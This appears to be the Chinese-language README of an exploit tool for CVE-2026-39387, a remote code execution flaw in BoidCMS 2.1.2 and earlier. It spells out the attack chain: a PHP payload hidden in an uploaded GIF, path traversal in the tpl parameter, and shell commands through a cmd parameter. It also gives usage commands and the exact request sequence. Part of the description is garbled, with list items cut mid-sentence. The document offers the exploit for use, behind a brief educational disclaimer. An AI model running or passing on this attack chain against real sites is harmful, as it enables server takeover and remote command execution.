
BoidCMS <= 2.1.2 RCE 漏洞利用
BoidCMS <= 2.1.2 允许经过认证的攻击者通过组合两个弱点实现远程代码执行(RCE):
image/gif)的文件,而不验证实际文件内容,从而允许将嵌入在 GIF 文件中的 PHP 代码存储在服务器上。tpl 参数,该参数在解析时相对于主题目录且未经净化,从而可利用路径遍历(例如 ../../media/shell.gif)将页面的模板指向已上传的文件。当构造的页面被渲染时,PHP 解释器会执行嵌入的载荷。
| 字段 | 值 |
|---|---|
| 软件 | BoidCMS |
| 版本 | <= 2.1.2 |
| CVE | CVE-2026-39387 |
python3 CVE-2026-39387.py -u <目标URL> -l <用户名> -p <密码>
python3 CVE-2026-39387.py -u http://target.com -l admin -p password123
漏洞利用完成后,将提供一个交互式 shell 提示符(cmd >>)用于在远程主机上执行命令。
1. 登录 → POST /admin (带 CSRF token)
2. 上传 shell → POST /admin?page=media (包含 PHP 载荷的 shell.gif)
3. 创建页面 → POST /admin?page=create (tpl=../../media/shell.gif)
4. 执行 shell → GET /<permalink>?cmd=<command>
pip install requests
此漏洞利用仅用于教育目的和授权的安全测试。未经授权对您不拥有或没有明确许可测试的系统使用,属于违法行为且不道德。
| 标志 | 描述 | 示例 |
|---|
-u, --url | 目标 BoidCMS 站点的基础 URL | http://target.com |
-l, --user | 管理员用户名 | admin |
-p, --passwd | 管理员密码 | password123 |